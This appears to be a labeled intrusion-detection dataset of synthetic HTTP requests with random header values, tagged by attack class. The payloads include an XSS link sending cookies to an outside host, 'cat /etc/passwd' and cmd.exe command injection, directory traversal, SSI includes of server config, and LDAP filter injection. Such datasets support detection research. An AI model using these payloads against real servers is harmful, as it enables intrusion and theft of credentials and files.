If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: *
Max-Forwards: 0
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: Digest username="eo31e"
Authorization: NTLM ZW50ZU9idGRtb295OW50eWFPeUp0MHRubXM3SHRzdXRic3Vybg==
Range: 88781-3
Referer: /wgA3n7ho/t6lq/tIOlhect/Rarkry/sfriape.wav
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Match
User-Agent: rgtttetuu (aHKNHATrXM; 8cDrRMwF; r1JSIeK)
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 207x5488
Via: 2.9 63.93.102.63
Transfer-Encoding: gzip
Upgrade: c6nsO/4.6
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 199.10.120.226
X-Serial-Number: 84157643689
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49958
Start - Id: 36704
class: OsCommanding
PUT /pjvnyPG/pKXc_6f0/yilameedie9f14rO/aJvh.mVUtby-/nsyTslrsrE/r_N3a18/nlcs5P8qECh0NtaJP2/rAX/r1O24VNATkajaWIfCDYT/deid9uOaht3ke6/betweenxp_dAnfpasswd41snkWf/ez.dll? HTTP/1.0
Content-Length: 116
Content-Language: t,iey
Content-Encoding: compress
Content-Location: /KHbei/estnt.bin
Content-MD5: NGhoYXdoaGl1aWhhaTlidA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 06:36:30 UTC
Last-Modified: Sun, 08 Nov 09 01:12:46 UTC
Host: www.eMwg8U.org
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9987
Client-ip: 24.6.250.56
Cookie: lloatona3r=387740
Cookie2: $Version="134"
Date: Tue, 04 Mar 08 20:50:05 GMT
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: 7oiToetn
From: eralt@eApeeioers.de
If-Modified-Since: Tue, 08 Jun 04 08:27:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 15:44:56 GMT
If-Match: *
If-Range: Tue, 09 Feb 10 24:01:39 UTC
Max-Forwards: 38
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: ssrr uentet=otetm
Authorization: Digest nonce
Range: 426198-
Referer: http://p4INeu.uk/tOtlcn.mp3
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: ioiqtguAn (pKNKFz9J; nchJf4IyMp; tIH@Arl; tbdKGr2C; gGh4ty)
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: 6.2 www.sp2ynr.js, 5.2 www.iieees.html
Transfer-Encoding: deflate
Upgrade: ebhmu/0.2, e37zho/7.1
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

6msrch9WentYi= z&lruttely8jo=/perl /tmp/olessi.pl -p8878&hm7tr=7GzNZBn6WK7U&t8=wenohtacces&rnodebw=xt5OfuHUJ1D

End - Id: 36704
Start - Id: 47803
class: XSS
GET /w4885ixzJp/opt8ay_Srfe3.shtml?ttaacynschl=%3Ca+++href++%3D%22++++about%3A%3Cs%26%2399%3Bript++++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.asesnang.com%2Fcgi-bin%2Fngteicnd.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E+++++%22%3E&wsab=8easegp&NWrcptelnetpJo9=tmpt+ia%26%2FnetcatdocumentssM%25a&hayTne=divsc&nir=oni&burren=Lowtt+d%3Cr&edmocjnsMvle=eaoZl&ne1sl=Ss%7CEdt%28%3CUsgtha%5BoMTphpe&udedss=21&Eystunna6md=s%283&rHefntj=0737 HTTP/1.1
Host: 185.80.220.83
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.7, identity;q=0.1, gzip, deflate;q=0.4, deflate
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 52.228.63.189
Cookie: 9kzl=oii;ie3ensee17se=2;aijbao=c@rkHobrs yesn 
Cookie2: $Version="20"
Date: Mon, 31 Aug 09 15:49:46 UTC
ETag: W/"zby_7s_k0d7Q5VhG"
Expect: 100-continue
From: shnba@roottg.it
If-Modified-Since: Wed, 30 Jun 04 11:35:04 GMT
If-Unmodified-Since: Tue, 13 Dec 05 17:18:37 CET
If-Match: "6QnSMEE56zYNrwWc8Tmq"
If-None-Match: *
If-Range: Tue, 03 Oct 06 05:04:31 CET
Max-Forwards: 101
MIME-Version: 8.3
Pragma: ny6z='X'
Proxy-Authorization: Digest username="oaid"
Authorization: Digest username="eoith"
Range: 944229-6,250-
Referer: http://www.yatu.biz/VhwOMse/teiidt14/mLetStn/pfiesw.mdb
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: eZYGvyC@iL http://www.jiDyn.ch
UA-CPU: 68000
UA-Disp: 191,879,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5941x524
Via: HTTP/5.1 www.oeaali.html, oaea/3.6 www.besmaat.png
Transfer-Encoding: compress
Upgrade: thgmp/3.3, cwanec/6.4
Warning: 828 187.164.150.25 "gathtunnr5k6dxt7" "Sat, 23 Apr 05 07:02:53 UTC"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47803
Start - Id: 39158
class: SSI
GET /llh18l@35FqXlPo/oiqasaTEunutfh/icvP/yEselzrrimq/jswP5ug5f1jRvzk/uTGu22x7v_zHpxx/gns/UBST/eetr0boc/cNOCWDNygIlcE/lCREHq.044ZNFHK8tE/1Fbn4QwpJ.aspx?S6Dundr=TAiMdrehJwuute&Ihs9ceafsdo6oe=kTae&h2a3=sDfthKtAm3&3oeh=83093328&cgtqred4=yE%2Bk&dct7iee5e=8473&UjrautoexecdocumentunetcatnvP=0ldy29L9-uGQ&Tro3nabedweoO=tiqcied&ceorwtldFhJ4s=ochildmailaes%25udir1&eFM9y=seicd HTTP/1.0
Host: www.iOime0eRah.it:12167
Connection: keep-alive
Accept: text/html, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=44212
Client-ip: 248.48.168.12
Cookie: hoMim3gRGgsno=eudeqdp;rdSynai=wPps;hcsfnlcntrb8=obdnp7s\;etei78Te=<!--#email fromhost="www.haC4fo.com" tohost="mailbox.iedel.com" message="9seLn otGaom Uomil wnej" fromaddress="eneif.com" toaddress="tzeme.8sno.com" subject="m7" sender="tmt.com" replyto="IeCtag.com" cc="pnee" inreplyto="v5rna Noi 5et" id="4idomail" -->
Cookie2: $Version="280"
Date: Sat, 04 Oct 08 14:05:36 CET
ETag: "cqE-rW0ywsLsYmYx80m"
Expect: 100-continue
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 996
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ny22t
Range: -50,6-,-25
Referer: http://ieFc.st/cormsnn/RshAAma/pearpoz/odwa.pl
TE: gzip;q=0.1
User-Agent: Mozilla/8.0 (compatible; MSIE 4.4; Unix; EEeC; Degsu; jptl)
UA-CPU: StrongARM
Via: uclpz/4.4 213.73.233.251, FTP/0.7 93.210.90.100, arlwfm/8.0 www.ytladl.js
Transfer-Encoding: deflate
Warning: 971 223.191.116.112 "thehe34eqmt" 

null

End - Id: 39158
Start - Id: 37636
class: LdapInjection
PUT /tsNKmXOa/sPr@0lRgCoC9aueCom.dll? HTTP/1.1
Content-Length: 330
Content-Language: s0r,8Sleis,t5l3Nut
Content-Encoding: gzip
Content-Location: /SnjIqkdo.exe
Content-MD5: dGdkY29ld2F0YXBjcXRtVA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jun 06 22:12:00 GMT
Last-Modified: Fri, 26 Jan 07 22:35:59 UTC
Host: www.Rvshvweq.be:80
Connection: nitAran
Accept: text/*, image/*
Accept-Charset: windows-1251
Accept-Encoding: gzip, gzip, gzip, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 223.102.217.31
Cookie: jhawoccn=ih(;u5<trlibboall%rts
Cookie2: $Version="477"
Date: Tue, 19 Aug 08 05:33:14 CET
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Thu, 07 Jan 10 15:04:34 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "I._WofJ-xkYMZu_"
If-Range: "oyGgXVYLn2f.HERzf"
Max-Forwards: 0
MIME-Version: 8.8
Pragma: irrl=cayvhxo
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: nltei epniie=dzlns
Range: 925-,-397
Referer: /6gmh.fgf
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: e3vz5oIxn
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: FTP/0.3 www.aect9.htm
Transfer-Encoding: compress
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 890650544330146
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pterledtaOt=qe~ew7eetes&cMoaslhaDnkcIa=08EV&acbeYNtge0Nburu=oi6logm|9&dgaBntpxnnHetu=37571408&nrxoy=203&e7oi='(toeeslstylelgroup bysuoHel|d &riaegdlll=rm7a5iiiiincuh33e&tyitdreslg=4&7eI4vyjeja=)   ( |(displayName=had*)   (name    =  had*)(   mail=had*)&tdnLsIbeapsiF=uIy1bXtmA&u5tnin6rn=818484190

End - Id: 37636
Start - Id: 42857
class: OsCommanding
GET /dE/oKk6VpKenv/rTu4wntlae/9tltitEmldycedf/h3Nk8y.NqsB21Q/uX0FJw4pkrmn/BbCaypASosOD@/EtarlOamces/xx_izHKNTVzh8JF4RN/iidzOvi/t64za9N.jpeg?ehHynxea5N=172.58.80.50+++%7Ccmd.exe+%2Fs&3h@ijtyEusrQ=118&scey=srnoszko&b3m=fZk5DMv9XP&efeeaolrrnt0=0&gxem2uyt=heowp-3+8s%7Eepoti&dom5nbagobofBe=b.9N&Hnots7a4hnrNo=8934747621 HTTP/1.0
Host: 145.232.10.150:11450
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 220.191.86.68
Cookie: DlAt6eps=A7odV9|bntnsde
Cookie2: $Version="0"
Date: Sun, 07 Mar 10 11:57:49 CET
ETag: "HnExqP@.ONn5WYu362o"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Thu, 08 Mar 07 08:42:11 UTC
If-Match: *
If-None-Match: "TvWaN9S.m2Nw5gLALYQ8"
If-Range: Sun, 24 Oct 04 14:12:12 CET
Max-Forwards: 584
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Basic bm9kZGRzc2c6b2FiYkY=
Range: -865928
Referer: http://www.0XtEa.com/nuvylh/ovte/Gmt7.jpeg
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: isac/5.2
UA-CPU: MIPS
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: gzip
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 322 www.3aaua.png "dnycjwts1Uhnsohdc" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42857
Start - Id: 39052
class: LdapInjection
POST /8itiltos4slhao8uradu/nsi2sT/uK.bt/tlrBsS5hob.html? HTTP/1.1
Content-Length: 94
Content-Language: suwt,istee
Content-Encoding: compress
Content-MD5: aGEwb3J0bnRvb3Rwem1lZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 May 04 04:31:41 GMT
Last-Modified: Fri, 26 Jun 09 09:46:25 UTC
Host: 197.212.164.157:5619
Connection: rldNu
Accept: audio/*;q=0.1, audio/*, text/plain;q=0.8
Accept-Charset: x-mac-korean, x-mac-ce, euc-kr, hz-gb-2312;q=0.0, macintosh;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: wn4rish-coi;q=0.0, kiba-m3dnnaee;q=0.9, hrrg-hoioMr;q=0.4
Cache-Control: re=t
Client-ip: 95.187.156.44
Cookie2: $Version="03"
Date: Mon, 03 Oct 05 14:29:12 GMT
Expect: 8aodet=rdr0
From: 0q6i@uewa.fr
If-Modified-Since: Sun, 07 Feb 10 05:49:00 GMT
If-Unmodified-Since: Tue, 28 Dec 04 18:33:26 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 May 05 22:18:34 CET
Max-Forwards: 70
Referer: /a7mgahee/eeAre/bIaotna.msf
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: )   ( |   ( cn=*o  'brien*    )(mail  =*o    'brien*   )    
Via: FTP/9.1 254.232.25.113, 5.1 178.4.232.165
Transfer-Encoding: identity
Upgrade: tiT/9.5
X-Serial-Number: 400559457

ein8thoecrii=5848&4l=1710041&biesi=jXu&YQz9zk=0715173&8adh=D5j8tog1rea%&lamihtRtsa7aiF6=meta

End - Id: 39052
Start - Id: 45797
class: PathTransversal
GET /l0/YYQo/eerbrh/VYMqna4Hbgsoundwinnt0xwp-P/woYYwUP/tutakotuyoarBno6a/uR6Lcz_optFMpassthrueO9x/nwwn-xOZyWH/ntehl8hU75wk3/i-Tz7aKiTR@aDGVVEPnp/iOH3replace.tiff?05o2lShtiNsj=ga&r3neazsg=77710&-location64GFQ5N=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&aTss2Iatm5ao=h.6&niEtohtld=t1 HTTP/1.1
Host: www.7uce05.net
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-japanese;q=0.1, utf-8;q=0.5, x-mac-cyrillic, isiri-3342, windows-1258;q=0.9
Accept-Encoding: compress, gzip;q=0.0, compress;q=0.7
Accept-Language: *
Cache-Control: meue='Darose7n'
Client-ip: 89.136.143.100
Cookie: ntz7oi0s0m==s =y;rt=yOPz_;ahtemhnstos=e-ZnPrN;xZTYuH.YnetcatselectTh=eoo
Cookie2: $Version="28"
Date: Fri, 10 Jul 09 22:34:36 UTC
ETag: "9GnhRAmRvCoiz6Yum"
Expect: tsoln3r=7idtmA
From: erir5sT@dLha.org
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: Wed, 13 Oct 04 04:01:46 GMT
Max-Forwards: 5
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ckh0ejB0a2F0aTduaXR2bHNpdG13dG9zNXJsYmxyZnk=
Authorization: Digest qop=bEneli
Range: 151606-
Referer: /iwdrpf/4phRtts/Dehwd/2cPa.exe
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.4 (compatible; MSIE 6.4; Mac OS X; sYaesa; atboddsi; mFneamalnD)
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9422x259
Via: 4.9 www.orxmrrt.jpeg:820
Transfer-Encoding: identity
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 71.201.98.2
X-Serial-Number: 06918680418533
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45797
Start - Id: 36346
class: PathTransversal
GET /nut12/eyqsKK0amUVb/cCaf/z_kT/mtsaadibIHrcJ5hge9.msf?2enso=%5Cse0srranam&tnsestzsn8ae=uee8eewd&atrcbvht=7nuicz+%3Dtpy%29c9owqb&habi=f2i5t3qg&bree=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion HTTP/1.1
Host: www.oot4soq9.uk
Connection: keep-alive
Accept: text/xml;q=0.2, text/*, audio/basic;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: rh='hhrityo'
Client-ip: 59.25.255.93
Cookie: e1nndsnh7gein=9srg46_RRT;laobjectn_9kZ2mN=ntcar;achrqYstdsoeais=3841;rnadhtAgetzen=oTrHahnaOarEsi;obghuvwcEftL=nne
Cookie2: $Version="405"
Date: Sat, 21 Jul 07 23:44:49 GMT
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: yIdnea=sctmien
From: sleras@7i3heoin.uk
If-Modified-Since: Sat, 27 May 06 19:44:21 GMT
If-Unmodified-Since: Wed, 20 Apr 05 06:26:59 GMT
If-Match: *
If-None-Match: "NA.hyK.v.iJ80NqR"
If-Range: Mon, 11 Dec 06 19:49:09 GMT
Max-Forwards: 914
MIME-Version: 2.6
Pragma: j='sbtemria'
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: taoyl eaenpa=isdee1bl
Range: 6-770122
Referer: /pyhst/hthde/iwahPitt.exe
TE: gzip,deflate,trailers
Trailer: From
User-Agent: Mozilla/6.2 (Windows; U; Win98 1.7; eq-7a; rv:6.7.5) Gecko/47915174
UA-CPU: x86
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: 8.9 110.175.190.201:2704
Transfer-Encoding: gzip
Warning: 201 www.dreo.png "soaIbe7zmO" 
X-Forwarded-For: 217.52.49.74
----: ------------

null

End - Id: 36346
Start - Id: 40752
class: SSI
PUT /a2/UmetaO7lACwxf@US.css? HTTP/1.0
Content-Length: 225
Content-Language: 6ud,inrfED
Content-Encoding: deflate
Content-Location: /10xie/Toonlnua.gif
Content-MD5: dG5vUmVjcm9lNm9jbm53cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Mar 05 07:33:11 GMT
Host: 46.179.188.234:73287
Connection: keep-alive
Accept: text/plain, application/*, text/plain
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.3
Accept-Language: ah3e4-efAmrqc;q=0.2
Cache-Control: no-cache
Client-ip: 57.138.29.237
Cookie: GBnUqo=j;Xfwv=oAt5;oPD9dO7=aewei-
Date: Thu, 25 Oct 07 11:45:12 UTC
ETag: "BgIhRrT-XK_XKHDxn"
Expect: eNay=ejiiueus;5h5utnem
If-Modified-Since: Sun, 04 Oct 09 04:14:03 GMT
If-Unmodified-Since: Sat, 04 Dec 04 02:15:14 CET
If-Match: "hqu7Ro2nNNkFVQkQ"
If-None-Match: *
If-Range: "BNjWyzlC55l@@SUV"
Max-Forwards: 26
MIME-Version: 8.0
Pragma: no-cache
Authorization: a5dgn oqirnd=ocAptm
Range: 30-86033,50297-483952,510771-833674
Referer: http://www.noa6.st/suia/emSyy/ahd7/lehelh7e.css
TE: trailers,gzip,trailers
User-Agent: Mozilla/2.2 (compatible; Konqueror/0.9; Win 9x; dDd5ls; ohh7; vict7eaz)
UA-CPU: MIPS
UA-Color: color16
Via: srrnkd/9.2 24.42.48.59, 5.4 www.swew.png
Transfer-Encoding: gzip
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
----: ----------------------------------------------

2g7r920Si=4'&ziR2c=9143&u1=0&u75aaQqU=o1&arwrna=<!-- #odbc   statement  =   "select   en,   EmtA5rnh,  ertaE     from   eote    order    by  3, 37, 4"     -->&st2x3s1ee=access_logqr1seD&eybt=4150321347

End - Id: 40752
Start - Id: 38910
class: LdapInjection
GET /nI@nExBJz0-/zL8wyq/ig/M9YRK/en1Wnosiaad/egSoTgpUQwEKIX6D/lpEeteVd/CRMoWOp5fj-gq/inrd/aoeadtsuy3nsl.pl?rXlW=2&7syaeawo7eDrrah=0960&edtb=%40&ardbuaE=iaTneeueseiotia&tTdtgo=sfsG6F8&rn=rBWvuUd&21onhr0t1=iil1eh&rainen5dcerenq=%29++%28%7C++%28displayName%3Dhad*%29++%28name%3D+++had*+%29%28+mail%3Dhad*++%29&dxt4NeOchose=zNwXJV&txiis5=++m&oIg_=75472&ht7=kx1ag&4jXSyTEkL=tM HTTP/1.1
Host: 138.149.174.179
Connection: close
Accept: application/postscript;q=0.1, text/html
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 68.221.116.115
Cookie: nO9io8=tygoaicsintqfciiy;Oupusss=a~ iaoBf4:o3;umocha8PPG4=tdocumentiecgymstdinivminsert 
Cookie2: $Version="96"
Date: Fri, 24 Oct 08 19:47:12 UTC
ETag: W/"E8jHF1YpjxHTbtDDxA"
Expect: 100-continue
From: neenu@alestrhlsH.gov
If-Modified-Since: Sun, 20 Mar 05 22:52:35 UTC
If-Unmodified-Since: Tue, 28 Dec 04 22:32:53 UTC
If-Match: "oGoXZrgLub7@borF5G"
If-None-Match: "72QjArJI6ifUx12"
If-Range: Wed, 31 May 06 24:02:14 GMT
Max-Forwards: 0241
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: Digest username="23tl"
Range: 82450-0782,-876
Referer: /adeegwl.bin
TE: trailers
Trailer: If-Modified-Since
User-Agent: siltE (es3mwesJ; eUtk8cAiVk; 9GWLDCUPUB; m8Zwpf)
UA-OS: Win95
Via: 4.1 236.104.63.112, 6.6 245.243.246.119:503
Transfer-Encoding: gzip
Warning: 030 15.234.179.243:602 "99idf55dwaaqmsdiequf" 
X-Forwarded-For: 180.80.58.236
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38910
Start - Id: 43560
class: OsCommanding
GET /s8cbIs9/nDmtaohdInah/hinsertgncHs0Jh8Binmail/WOcelMMwLdaccept8/kFJLafzUo4wF7CqD/eOjP9umWdB5.JO/bNZiydzJP.html?ssE8fmoNrSch=cat+++%2Fetc%2Fpasswd+++%7C&ni5tanttbenc=a%5Chah+eoiinputdexecwenk%2B5&aiZ.Scfd2Ue=r&etehmEOiai=24 HTTP/1.1
Host: 164.0.79.158
Connection: close
Accept: application/postscript
Accept-Charset: x-mac-japanese;q=0.6, utf-8;q=0.0
Accept-Encoding: identity;q=0.8
Accept-Language: a-euudndt7
Cache-Control: wtenle=Esihi
Client-ip: 214.70.1.175
Cookie: eTTanstng=n<lasi5re8;onWhnr=941;gke0=opt;I4Ld0avChttpkuv=r 7]fiphp lP;nllc=oreplacen
Cookie2: $Version="2"
Date: Tue, 28 Jun 05 17:38:40 GMT
ETag: "rbXdJ_rpju37Ky592dJN"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Tue, 08 Apr 08 24:59:03 CET
If-Unmodified-Since: Sat, 24 Apr 10 04:11:51 GMT
If-Match: "OocUsqj8sAMR@yi"
If-None-Match: "xda6ERacz_uD_f3R.sJ"
If-Range: "CT8FV.6p_EE5..7"
Max-Forwards: 6669
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: eezUd afntnf=eRzn
Authorization: dprin7 woie=reEn
Range: -262090,-9
Referer: http://crsi.gov/nthednfs/ntng/jlnta/lpetvv5.gz
TE: deflate,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: k0t6eWzefetm
UA-CPU: x86
UA-Disp: 1895,188,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: FTP/0.1 99.210.176.60, 1gh/9.6 66.137.93.84
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43560
Start - Id: 35922
class: PathTransversal
GET /jFlGYRSYPARBHoPbHj/4AT/b8e4ttsysw/EaweeIs/vxVMfromvxfhlJ/Auaife9n4tn/etepeob1sDdacsuo.nsf? HTTP/1.0
Host: 6.190.96.209:7796
Connection: close
Accept: text/xml;q=0.6, text/xml, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate
Accept-Language: hORuilh-as, oq2s2ehm-Rwsmhe;q=0.6, c-smr;q=0.9, ejhh-oc;q=0.1, nwrodea-y;q=0.9
Date: Sun, 11 Nov 07 24:29:46 GMT
If-Modified-Since: Sat, 02 Oct 04 05:32:02 GMT
If-Unmodified-Since: Tue, 27 Jun 06 10:14:15 UTC
If-Range: "1wmutHmGwiHt-mn"
Max-Forwards: 815
Referer: http://5l0lll5s.gov/uoie/o9wuadon/rion.php4
User-Agent: <!--   #include  virtual="/etc/httpd/httpd.conf" -->

null

End - Id: 35922
Start - Id: 37832
class: LdapInjection
GET /nYk4tbtEr@hBrcEDxG9./iiER6/pirtnV/ruhroueRrrm/ttthItO/atmOGP/t8R6zmRd9wGhAJI68Y/yp5/lB0T-jtmKlaFotb/sdtttadaAtqBdAj/sz/Ahu.swf?o4arc=%29%28+++%7C+%28Muk%3Dun*%29 HTTP/1.0
Host: www.macr.ch
Connection: keep-alive
Accept: video/mpeg;q=0.2, text/*;q=0.8, video/mpeg
Accept-Charset: windows-1254;q=0.2, x-mac-cyrillic;q=0.7, x-mac-arabic, euc-cn;q=0.0, utf-8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 64.240.110.73
Cookie: rs=830630;Sintm7ureatte8u=oaa3XE42s;codrhlanoTo=ni1TbjWrnte
Cookie2: $Version="89"
Date: Wed, 12 Sep 07 15:33:46 UTC
ETag: W/"7bZNocxT.N2HZG9O"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Sun, 29 Apr 07 18:35:43 UTC
If-Unmodified-Since: Mon, 24 Aug 09 06:15:06 CET
If-Match: "NicbM4cEVa4yWhGT"
If-None-Match: *
If-Range: "EMJqZO.82YVLxrXaLI"
Max-Forwards: 7292
MIME-Version: 1.8
Pragma: igernt='u'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: Basic YVJ1ZWM2Om9ybzQ=
Range: 853418-,-430
Referer: /aalf/iTtn/ogL1hE0a.cgi
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: eeEcrlRa (nloRwN.Hw; iw6pH@iF0; rwh54N.6y; tpG7RZ7aGM)
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 8.5 219.117.54.210, 4.0 214.42.120.171
Transfer-Encoding: compress
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37832
Start - Id: 37634
class: LdapInjection
PUT /Eohs4HteEho/7XC/dts.jpg? HTTP/1.0
Content-Length: 271
Content-Language: HhbbilD
Content-Encoding: deflate
Content-Location: http://3OhhaO.net/eapr11/Aheney3/ou23o8/ewupcjfs/H9hbt.jsp
Content-MD5: dGdkY29ld2F0YXBjcXRtVA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jun 06 22:12:00 GMT
Last-Modified: Fri, 26 Jan 07 22:35:59 UTC
Host: 49.167.82.218:30320
Connection: close
Accept: video/*;q=0.8, audio/*;q=0.8
Accept-Charset: windows-1253;q=0.3, iso-10646-ucs-2, windows-1250, cp-950
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 48.79.161.71
Cookie: unionmochaIdMJU0position=+ipsoew>0t2ecAr;ebrofte25atv=9OaI
Cookie2: $Version="477"
Date: Tue, 24 Feb 09 21:37:37 GMT
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Sat, 30 Jun 07 20:33:18 GMT
If-Unmodified-Since: Tue, 26 May 09 04:17:29 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "22u0tT@gOVnC30bdf"
If-Range: "oyGgXVYLn2f.HERzf"
Max-Forwards: 0
MIME-Version: 8.8
Pragma: irrl=cayvhxo
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: nltei epniie=dzlns
Range: 70-,507-
Referer: /8rnnD/aelcve/aEseih/elie.php
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 0.9; Ed-nO; rv:1.7.5) Gecko/30398810
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: 4.3 www.ne8nGp.html
Transfer-Encoding: oo2rF1; vii9w8=zsspt
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
